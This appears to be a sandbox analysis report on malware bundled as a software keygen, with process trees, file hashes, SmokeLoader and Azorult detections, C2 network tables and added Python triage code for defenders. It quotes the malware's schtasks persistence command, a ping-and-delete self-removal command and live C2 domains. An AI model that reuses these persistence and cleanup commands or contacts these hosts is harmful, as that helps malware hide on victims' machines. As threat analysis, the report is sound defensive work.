C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

Network

Files

memory/1552-0-0x000000007490E000-0x000000007490F000-memory.dmp

memory/1552-1-0x0000000000230000-0x0000000000406000-memory.dmp

\Users\Admin\AppData\Local\Temp\chrome3.exe

MD5 4b0d49f7c8712d7a0d44306309f2e962
SHA1 5f0a2536f215babccf860c7ccdeaf7055bb59cad
SHA256 f996915ce7203dc3661afa686637426fab14c91682ada02054d2f64ce245af60
SHA512 50dc00bebdafdc2cc1792a45cab5f13773ff0026c20618eec29f50000261afba65f58cec5d30be0fd5aaea17cac30b97b16be70c6f430987cd10a8488948ee2b

\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe

MD5 13e802bd360e44591d7d23036ce1fd33
SHA1 091a58503734848a4716382862526859299ef345
SHA256 e24c3eda7673062c9b243a09bc91e608f4d9dcc5de27db025b5ad150ae014f2b
SHA512 8bb52a3b0852cc345be7d4b50b19c3778bcae5cb7ee654aced93772bee6fd22d1e87c484d91afb10af040d7c52b0f1e0b60de47a28d8eeea5e3c6afcead6163b

\Users\Admin\AppData\Local\Temp\2.exe

MD5 a5bace3c3c2fa1cb766775746a046594
SHA1 9998cad5ba39e0be94347fcd2a2affd0c0a25930
SHA256 617de4cdc27fb67b299a0d95ff2129d0ea2488040bcfd5f64868a0fab33af7a6
SHA512 66f0cb5b820014a8d73bab706de8138d22a4d690d77726ac53b785daf99ed45646c8b0236bf10e209039f78324a63c3ee1c2f7ccf852fa7d579753cb9f659184

\Users\Admin\AppData\Local\Temp\setup.exe

MD5 0ebb4afbb726f3ca17896a0274b78290
SHA1 b543a593cfa0cc84b6af0457ccdc27c1b42ea622
SHA256 2fd099e9c096efb59756565d50243387d7669d60c2088e842f1f5d9ef297b6d2
SHA512 284063f08667af11bc593dcb88f19d2bc6b9fd1e2edf368fdc78f07c9956fa3078673ee7dd7ca349e32cb1f848edfeab3b6a758eac5e5c3d36dc1a8764353d11

memory/2972-26-0x0000000000200000-0x0000000000208000-memory.dmp

memory/2812-25-0x0000000001300000-0x0000000001320000-memory.dmp

memory/2816-24-0x000000013FE70000-0x000000013FE80000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

MD5 f9be28007149d38c6ccb7a7ab1fcf7e5
SHA1 eba6ac68efa579c97da96494cde7ce063579d168
SHA256 5f6fc7b3ebd510eead2d525eb22f80e08d8aeb607bd4ea2bbe2eb4b5afc92914
SHA512 8806ff483b8a2658c042e289149e7810e2fb6a72fb72adbf39ed10a41dbab3131e8dfdaca4b4dba62ed767e53d57bd26c4d8005ce0b057606662b9b8ebb83171

memory/2812-39-0x0000000000140000-0x000000000015A000-memory.dmp

memory/2868-40-0x0000000000400000-0x0000000002B59000-memory.dmp

memory/2816-43-0x0000000000560000-0x000000000056E000-memory.dmp

memory/876-50-0x000000013F550000-0x000000013F560000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

MD5 9910203407b2605107587e954081c575
SHA1 8037bfb3b779fbbb3273df4f5c63d15b9589ce95
SHA256 07b00c604d6473439dcd16b47cbefa450aad400871cb2215f0814547aca81b49
SHA512 ba2c532d16eb259ae1621ac6ab668b4da28b2a842cb7320eee11982e2b835979c1ec6c566e3207e798fd2d0767070a568d2cd32dbb19200572afb2c7b32a68be

memory/1980-61-0x000000013FA30000-0x000000013FA36000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabFCF7.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\TarFD38.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Analysis: behavioral9

Detonation Overview

Submitted

2024-11-10 13:01

Reported

2024-11-10 13:04

Platform

win7-20240903-en

Max time kernel

122s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Setup.exe"

Signatures

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Setup.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Setup.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\Setup.exe"

Network

Country Destination Domain Proto
SG 37.0.10.214:80 tcp
SG 37.0.10.244:80 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 172.67.133.215:80 wfsdragon.ru tcp
MX 31.210.20.251:80 tcp

Files

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2024-11-10 13:01

Reported

2024-11-10 13:04

Platform

win10v2004-20241007-en

Max time kernel

95s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\f2217e5f.exe"

Signatures

SmokeLoader

trojan backdoor smokeloader

Smokeloader family

smokeloader

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-4\f2217e5f.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\keygen-step-4\f2217e5f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\keygen-step-4\f2217e5f.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\keygen-step-4\f2217e5f.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\f2217e5f.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\f2217e5f.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2492 -ip 2492

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2492 -s 352

Network

Files

Analysis: behavioral16

Detonation Overview

Submitted

2024-11-10 13:01

Reported

2024-11-10 13:04

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\ss.exe"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4\ss.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\ss.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\ss.exe"

Network

Files

Analysis: behavioral19

Detonation Overview

Submitted

2024-11-10 13:01

Reported

2024-11-10 13:04

Platform

win7-20240708-en

Max time kernel

121s

Max time network

122s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\keygen.bat"

Signatures

Azorult

trojan infostealer azorult

Azorult family

azorult

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\winnetdriv.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A
File opened for modification C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\winnetdriv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2316 wrote to memory of 3048 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe
PID 2316 wrote to memory of 3048 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe
PID 2316 wrote to memory of 3048 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe
PID 2316 wrote to memory of 3048 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe
PID 2316 wrote to memory of 2352 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe
PID 2316 wrote to memory of 2352 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe
PID 2316 wrote to memory of 2352 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe
PID 2316 wrote to memory of 2352 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe
PID 2316 wrote to memory of 3052 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe
PID 2316 wrote to memory of 3052 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe
PID 2316 wrote to memory of 3052 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe
PID 2316 wrote to memory of 3052 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe
PID 3052 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe
PID 3052 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe
PID 3052 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe
PID 3052 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe
PID 2352 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe C:\Windows\SysWOW64\cmd.exe
PID 2352 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe C:\Windows\SysWOW64\cmd.exe
PID 2352 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe C:\Windows\SysWOW64\cmd.exe
PID 2352 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe C:\Windows\SysWOW64\cmd.exe
PID 2564 wrote to memory of 2672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2564 wrote to memory of 2672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2564 wrote to memory of 2672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2564 wrote to memory of 2672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\keygen.bat"

C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe

keygen-step-1.exe

C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe

keygen-step-6.exe

C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe

keygen-step-3.exe

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe" 1731243708 0

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe" >> NUL

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1
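
The WriteProcessMemory rows above are the sandbox's record of parent-to-child process creation (one row is logged per write, so the same edge appears several times), and the Processes list pairs each image with the command line it was launched with. Two details in that list deserve a check: the SysWOW64 cmd.exe runs `ping 127.0.0.1 && del "...\keygen-step-6.exe"`, a delay-then-delete idiom that removes the dropper once its payload is running, and C:\Windows\winnetdriv.exe runs with a command line whose argv[0] is the original keygen-step-3.exe path followed by `1731243708 0`; read as a Unix timestamp, 1731243708 is 2024-11-10 13:01:48 UTC, the minute this detonation was submitted. The Python below is an added example (not the report's or the sandbox vendor's code) that rebuilds the tree from those rows and flags both patterns; its sample rows are copied from the tables above, and reading that argument as a launch timestamp is an assumption.

```python
import os
import re
from datetime import datetime, timezone

WRITE_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (\S+) (\S+)$")
# cmd /c ping 127.0.0.1 && del "<file>": delay-then-delete idiom a dropper uses
# to remove its own executable once the payload is running.
SELF_DELETE_RE = re.compile(r"ping\s+127\.0\.0\.1\b.*&&\s*del\b", re.IGNORECASE)

# Constructed sample: rows from the WriteProcessMemory table above. The sandbox
# logs one row per write, so the first edge is deliberately listed twice.
WRITE_ROWS = [
    r"PID 2316 wrote to memory of 3052 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe",
    r"PID 2316 wrote to memory of 3052 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe",
    r"PID 3052 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe",
    r"PID 2352 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe C:\Windows\SysWOW64\cmd.exe",
    r"PID 2564 wrote to memory of 2672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE",
]

# Constructed sample: (image path, command line) pairs from the Processes list.
PROCESSES = [
    (r"C:\Windows\system32\cmd.exe", r'cmd /c "C:\Users\Admin\AppData\Local\Temp\keygen.bat"'),
    (r"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe", "keygen-step-3.exe"),
    (r"C:\Windows\winnetdriv.exe", r'"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe" 1731243708 0'),
    (r"C:\Windows\SysWOW64\cmd.exe",
     r'"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe" >> NUL'),
    (r"C:\Windows\SysWOW64\PING.EXE", "ping 127.0.0.1"),
]


def parse_edges(rows):
    """{(parent_pid, child_pid): (parent_image, child_image)}, duplicate rows collapsed."""
    edges = {}
    for row in rows:
        m = WRITE_RE.match(row.strip())
        if m:
            ppid, cpid, pimg, cimg = m.groups()
            edges[(int(ppid), int(cpid))] = (pimg, cimg)
    return edges


def render_tree(edges):
    """Indented text tree; roots are PIDs that never appear as a child."""
    children, image = {}, {}
    for (ppid, cpid), (pimg, cimg) in edges.items():
        children.setdefault(ppid, []).append(cpid)
        image[ppid], image[cpid] = pimg, cimg
    child_pids = {cpid for _, cpid in edges}
    lines = []

    def walk(pid, depth):
        lines.append("  " * depth + f"{pid} {image[pid]}")
        for c in sorted(children.get(pid, [])):
            walk(c, depth + 1)

    for root in sorted(p for p in image if p not in child_pids):
        walk(root, 0)
    return "\n".join(lines)


def argv0(cmdline):
    """First token of a Windows command line, honouring a quoted argv[0]."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split(None, 1)[0] if s else ""


def argv0_mismatch(image_path, cmdline):
    """True when the binary actually running is not the one argv[0] claims
    (winnetdriv.exe launched as keygen-step-3.exe). Compared by basename without
    extension so WOW64 redirection and 'cmd' vs 'cmd.exe' do not trigger it."""
    def stem(p):
        return os.path.splitext(p.replace("\\", "/").rsplit("/", 1)[-1])[0].lower()
    return stem(image_path) != stem(argv0(cmdline))


def is_self_delete(cmdline):
    return bool(SELF_DELETE_RE.search(cmdline))


def epoch_args(cmdline):
    """Bare arguments that look like Unix timestamps, decoded to UTC. Assumption:
    the 1731243708 handed to winnetdriv.exe is one; it decodes to the minute this
    detonation was submitted."""
    return [datetime.fromtimestamp(int(t), tz=timezone.utc).isoformat()
            for t in cmdline.split()
            if t.isdigit() and 1_500_000_000 <= int(t) <= 2_000_000_000]


def triage(processes):
    """(image, finding) pairs for the suspicious entries in a Processes list."""
    findings = []
    for image, cmdline in processes:
        if is_self_delete(cmdline):
            findings.append((image, "self-delete via ping && del"))
        if argv0_mismatch(image, cmdline):
            findings.append((image, f"image path differs from argv[0] {argv0(cmdline)!r}"))
        findings += [(image, f"epoch argument decodes to {ts}") for ts in epoch_args(cmdline)]
    return findings
```

Running `render_tree(parse_edges(WRITE_ROWS))` prints the two chains (cmd.exe → keygen-step-3.exe → winnetdriv.exe, and keygen-step-6.exe → cmd.exe → PING.EXE), and `triage(PROCESSES)` returns the self-delete hit, the winnetdriv.exe argv[0] mismatch and the decoded timestamp; the basename comparison is what keeps the SysWOW64 cmd.exe launched as `C:\Windows\system32\cmd.exe` from being a false positive.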

Network

Country Destination Domain Proto
US 8.8.8.8:53 kvaka.li udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.102:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
US 8.8.8.8:53 kvaka.li udp
US 8.8.8.8:53 evaexpand.com udp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.102:443 evaexpand.com tcp
GB 195.200.9.102:443 evaexpand.com tcp
GB 195.200.9.102:443 evaexpand.com tcp
GB 195.200.9.102:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
GB 91.108.103.86:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 91.108.103.210:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
US 8.8.8.8:53 www.wpdsfds23x.com udp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.102:443 evaexpand.com tcp
GB 195.200.9.102:443 evaexpand.com tcp
GB 195.200.9.102:443 evaexpand.com tcp
GB 195.200.9.102:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 91.108.103.86:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.102:443 evaexpand.com tcp
GB 195.200.9.102:443 evaexpand.com tcp
GB 195.200.9.102:443 evaexpand.com tcp
GB 195.200.9.102:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.102:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.102:443 evaexpand.com tcp
GB 195.200.9.102:443 evaexpand.com tcp
GB 195.200.9.102:443 evaexpand.com tcp
GB 195.200.9.102:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 91.108.103.86:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
GB 185.77.97.204:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.102:443 evaexpand.com tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.18:80 crl.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 23.192.22.93:80 www.microsoft.com tcp
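
The Network tables in this report list every DNS query and connection the sandbox saw, which mixes the sample's own infrastructure (evaexpand.com across three IPs, iplogger.org, ip-api.com) with resolver traffic, reverse lookups and OS certificate-status checks, and some rows carry no domain at all (a direct-to-IP connection, or a query whose name was not recorded). The Python below is an added example, not part of the report, that reduces such rows to a block list and separates names the sample resolved but never connected to from endpoints it actually reached; the rows are a subset copied from the tables in this report, and the set of hosts treated as benign OS noise is an assumption.

```python
import re
from collections import Counter, defaultdict

# Row layout of the Network tables: "<CC> <ip>:<port> [<domain>] <tcp|udp>".
# The domain column is absent on direct-IP connections and on some resolver rows.
ROW_RE = re.compile(r"^([A-Z]{2}) ([\d.]+):(\d+)(?: (\S+))? (tcp|udp)$")
RESOLVER = ("8.8.8.8", "53")  # the sandbox's DNS forwarder
# Assumption: CRL / certificate-status hosts touched by the OS and browser rather
# than by the sample; treated as noise here.
BENIGN = {"crl.microsoft.com", "www.microsoft.com", "c.pki.goog"}

# Constructed sample: a subset of rows copied from the Network tables in this report.
ROWS = [
    "US 8.8.8.8:53 kvaka.li udp",
    "US 8.8.8.8:53 iplogger.org udp",
    "US 104.26.2.46:443 iplogger.org tcp",
    "US 8.8.8.8:53 c.pki.goog udp",
    "GB 142.250.187.227:80 c.pki.goog tcp",
    "US 8.8.8.8:53 ip-api.com udp",
    "US 208.95.112.1:80 ip-api.com tcp",
    "US 8.8.8.8:53 evaexpand.com udp",
    "GB 185.77.97.204:443 evaexpand.com tcp",
    "GB 185.77.97.204:443 evaexpand.com tcp",
    "GB 195.200.9.102:443 evaexpand.com tcp",
    "GB 91.108.103.86:443 evaexpand.com tcp",
    "US 8.8.8.8:53 www.wpdsfds23x.com udp",
    "US 8.8.8.8:53 204.97.77.185.in-addr.arpa udp",
    "US 8.8.8.8:53 crl.microsoft.com udp",
    "GB 2.19.117.18:80 crl.microsoft.com tcp",
    "SG 37.0.10.214:80 tcp",
    "US 8.8.8.8:53 udp",
    "US 8.8.8.8:53 pastebin.com udp",
    "US 104.20.4.235:443 pastebin.com tcp",
]


def summarize(rows, benign=BENIGN):
    """Split rows into: names the sample resolved, endpoints it connected to
    (per domain, with hit counts) and connections made straight to an IP."""
    queried, contacted, direct = Counter(), defaultdict(Counter), Counter()
    for row in rows:
        m = ROW_RE.match(row.strip())
        if not m:
            continue
        _cc, ip, port, domain, proto = m.groups()
        if domain in benign:
            continue
        endpoint = f"{ip}:{port}/{proto}"
        if (ip, port) == RESOLVER:
            # A lookup, not a contact. Reverse (PTR) lookups are not
            # sample-driven indicators, so they are dropped.
            if domain and not domain.endswith(".in-addr.arpa"):
                queried[domain] += 1
        elif domain:
            contacted[domain][endpoint] += 1
        else:
            direct[endpoint] += 1
    return queried, contacted, direct


def never_contacted(queried, contacted):
    """Names resolved but never connected to (kvaka.li, www.wpdsfds23x.com above):
    dead, sinkholed or unresolvable infrastructure that is still worth blocking."""
    return sorted(set(queried) - set(contacted))


def ioc_list(rows):
    """Flat, de-duplicated block list: domains, the IPs they resolved to, direct IPs."""
    queried, contacted, direct = summarize(rows)
    iocs = set(queried) | set(contacted)
    for endpoints in contacted.values():
        iocs |= {e.split(":")[0] for e in endpoints}
    iocs |= {e.split(":")[0] for e in direct}
    return sorted(iocs)
```

On the rows above, `summarize` attributes three distinct IPs to evaexpand.com with per-endpoint counts, `never_contacted` returns kvaka.li and www.wpdsfds23x.com, and `ioc_list` omits 8.8.8.8 and the certificate hosts while keeping the bare 37.0.10.214:80 connection.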

Files

memory/2352-0-0x00000000000F0000-0x0000000000108000-memory.dmp

memory/3052-5-0x0000000000440000-0x0000000000525000-memory.dmp

C:\Windows\winnetdriv.exe

MD5 265cadde82b0c66dc39ad2d9ee800754
SHA1 2e9604eade6951d5a5b4a44bee1281e32166f395
SHA256 40fd6a0b671a0e5074a206201f57f7731a0d01baab5874b28a9b0f019a451c5a
SHA512 c99f3a5464e1ac02402814401c2cb66a9fafb794356395c1081bdf3c4c3534086498c19efe4055780a52a1bb80db81658c2cb4af5271015af51edf7bd3865e7b

